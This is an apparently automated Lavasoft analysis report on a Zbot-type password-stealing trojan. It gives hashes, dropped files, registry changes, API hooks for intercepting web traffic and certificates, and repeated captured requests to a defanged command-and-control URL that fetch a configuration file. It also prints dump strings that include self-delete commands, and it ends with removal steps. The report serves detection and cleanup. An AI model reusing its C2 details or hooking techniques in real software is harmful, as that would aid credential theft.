Trojan.GenericKD.1876648_f9c3b1549c

by malwarelabrobot on November 3rd, 2014 in Malware Descriptions.

Trojan.Win32.Autoit.drd (Kaspersky), Trojan.GenericKD.1876648 (B) (Emsisoft), Trojan.GenericKD.1876648 (AdAware), Trojan-PSW.Win32.Zbot.6.FD, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: f9c3b1549c263d837013370fe34fa5fd
SHA1: be10135ba5d80cf64cf2ce0eeefebe08a74d1b16
SHA256: 00497ccc049a042bd2a72544dec054923fbb59bd60a68ed5c833eed76bbcb63b
SSDeep: 12288:J6Wq4aaE6KwyF5L0Y2D1PqLrnbL1EB9RoqKkgcU:fthEVaPqLjbL1EBEq5tU
Size: 641334 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: ?????????? ??????????
Created at: 2012-01-29 23:32:28
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:584
%original file name%.exe:348
kiitm.exe:592
kiitm.exe:1664

The Trojan injects its code into the following process(es):

Explorer.EXE:888

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Acabse\kiitm.exe (3714 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpda55e9dc.bat (177 bytes)

Registry activity

The process %original file name%.exe:584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 34 77 AE C3 C0 F5 ED CD B7 F1 2D 8E 98 2D B1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 BA FC 89 1B 79 16 46 3C F4 AA 30 96 A0 FD BD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process kiitm.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 C4 FE BD 45 0D A1 80 53 95 1B 02 F0 83 E1 DD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process kiitm.exe:1664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 9B A0 08 84 C7 C3 2F D7 C4 DF 40 6A 81 58 81"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

Dropped PE files

MD5	File path
06bd58caa71a37c8ec064062a9bc21cc	c:\Documents and Settings\"%CurrentUserName%"\Application Data\Acabse\kiitm.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in USER32.dll:

SetCursorPos
DefMDIChildProcA
DefFrameProcA
DefDlgProcA
GetClipboardData
DefMDIChildProcW
DefFrameProcW
GetUpdateRgn
RegisterClassA
GetDCEx
ReleaseCapture
SetCapture
DefWindowProcA
CallWindowProcA
GetUpdateRect
PeekMessageA
CallWindowProcW
GetMessagePos
GetCursorPos
EndPaint
BeginPaint
DefWindowProcW
RegisterClassExA
GetMessageA
DefDlgProcW
SwitchDesktop
OpenInputDesktop
RegisterClassExW
RegisterClassW
GetCapture
PeekMessageW
GetMessageW
GetWindowDC
TranslateMessage
GetDC
ReleaseDC

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
send
closesocket

The Trojan installs the following user-mode hooks in kernel32.dll:

GetFileAttributesExW

The Trojan installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtCreateThread

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3, 3, 8, 1
File Description:
Comments:
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	483328	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	487424	274432	270848	5.49592	d1248dd07f9600cf0199efb427a3e365
.rsrc	761856	32768	29696	4.09505	081e9bf7107c6346fa754a81d71e3c24

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 131
0f7547e2d43b1f31f785d242fa70d810
de62052b17ebc3add041b29cd60cf6b6
7c13e0168173ec0efa45aae6668fbf59
7606c25f0b67fd866fc6199740c1d53f
baa33a7926d73020a9dada84bacdd79b
2d2c9d27bca27d435096ee325cab489e
53815f53f3e0fc56756cee1a4ed267db
06ea3dcd51ffdf8e15403f8e22e43cc2
dce441da3c6130ba04991ec5d42fc424
b390f2acc410cae47698b3f6f67b798d
00a538c5d0c32d1cbcb9e79fac427fd6
77cf67f4e1ab9b7791ca0a5fa44cc764
9e1f932d2c808dce912419c78d51b0b3
caaae336ca47c5b9d2f845025b955b55
04f4921d736a8453410cda77aec62cb7
d37ba7bd7219fba64cd17dc5b2bb1f9a
c2af7288dc9b607248001170ed5ace84
65a95da55c36f4f321a81baf509eb625
e0bfd699f849fd48871d41e443996c95
13a0124656b487ead1623ddab6018216
cbc91a01077850b2cfd5cee108d77c04
ab267f8c27c546a8e0d478f54d7bde77
11114735f3339d66b6623052b6d96a81
001b2c8b4953c621666160527ca72bab
697292c02ad3c92481cc77ded663845b

URLs

URL	IP
hxxp://nieuwsbriefdehomme.nl/wp/adminpanel/modules/config.bin	95.211.19.64

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin

Traffic

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:26 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .  ..

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:20 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .

<<< skipped >>>

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:37 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .  ..

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:31 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .  ..

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:26 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .  ..

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:20 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .  ..

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:42 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .

<<< skipped >>>

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:31 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .  ..

GET /wp/adminpanel/modules/config.bin HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

Host: nieuwsbriefdehomme.nl

Cache-Control: no-cache


HTTP/1.1 500 Internal Server Error

Date: Sat, 01 Nov 2014 10:30:37 GMT

Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Content-Length: 7453

Connection: close

Content-Type: text/html

.<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML>
<HEAD>.<TITLE>509 Bandwidth Limit Exceeded</TITLE>.&
lt;/HEAD><BODY>.<H1>Bandwidth Limit Exceeded</H1>
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .      .      .      .      .      .      .      
.      .      .      .  ..

The Trojan connects to the servers at the folowing location(s):

Explorer.EXE_888_rwx_01EA0000_0002C000:

.text

`.data

.reloc

gdiplus.dll

GdiplusShutdown

ole32.dll

gdi32.dll

HTTP/1.1

hXXp://nieuwsbriefdehomme.nl/wp/adminpanel/modules/config.bin

Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2)

pufjwdx.jvh

" !=%(>";;

=225;6%%7!=

3:6 1*7=$;-

*4*-0*1?7!

MK[(bocmdgs

15#77??68.

&'/( <99

$!*4,#)<:

mfh{g~amzgs.dgg

:; 1299;2

>.Rdd

<-?).$: (26

userenv.dll

del "%s"

if exist "%s" goto d

del /F "%s"

urlmon.dll

cabinet.dll

hXXp://

hXXps://

HTTP/1.

hXXp://VVV.google.com/webhp

t7SSSh

t"SSSh

GetProcessHeap

KERNEL32.dll

MapVirtualKeyW

ExitWindowsEx

OpenWindowStationW

GetProcessWindowStation

CreateWindowStationW

CloseWindowStation

SetProcessWindowStation

SetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

RegOpenKeyExW

RegEnumKeyExW

RegCloseKey

RegCreateKeyExW

ADVAPI32.dll

UrlUnescapeA

SHDeleteKeyW

PathIsURLW

SHLWAPI.dll

ShellExecuteW

SHELL32.dll

Secur32.dll

SetViewportOrgEx

GDI32.dll

WS2_32.dll

CertDeleteCertificateFromStore

CertOpenSystemStoreW

CertCloseStore

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

PFXExportCertStoreEx

CRYPT32.dll

HttpQueryInfoA

InternetCrackUrlA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestW

GetUrlCacheEntryInfoW

HttpAddRequestHeadersW

WININET.dll

OLEAUT32.dll

NETAPI32.dll

=?>#?.?;?

9%9)9/939

SysShadow

kernel32.dll

"%s" %s

/c "%s"

%sx.%s

%sx

cGlobal\XXX

Global\{10E68876-50C7-FFEC-F996-D45D7C99530B}

%Documents and Settings%\%current user%\Application Data

{A37647AF-47FE-8921-951E-5D1A13CEE950}

%Documents and Settings%\%current user%\Application Data\Upupu\raimu.uci

%Documents and Settings%\%current user%\Application Data\Upupu

raimu.uci

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:584
%original file name%.exe:348
kiitm.exe:592
kiitm.exe:1664
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Application Data\Acabse\kiitm.exe (3714 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpda55e9dc.bat (177 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.GenericKD.1876648_f9c3b1549c

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.GenericKD.1876648_f9c3b1549c

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet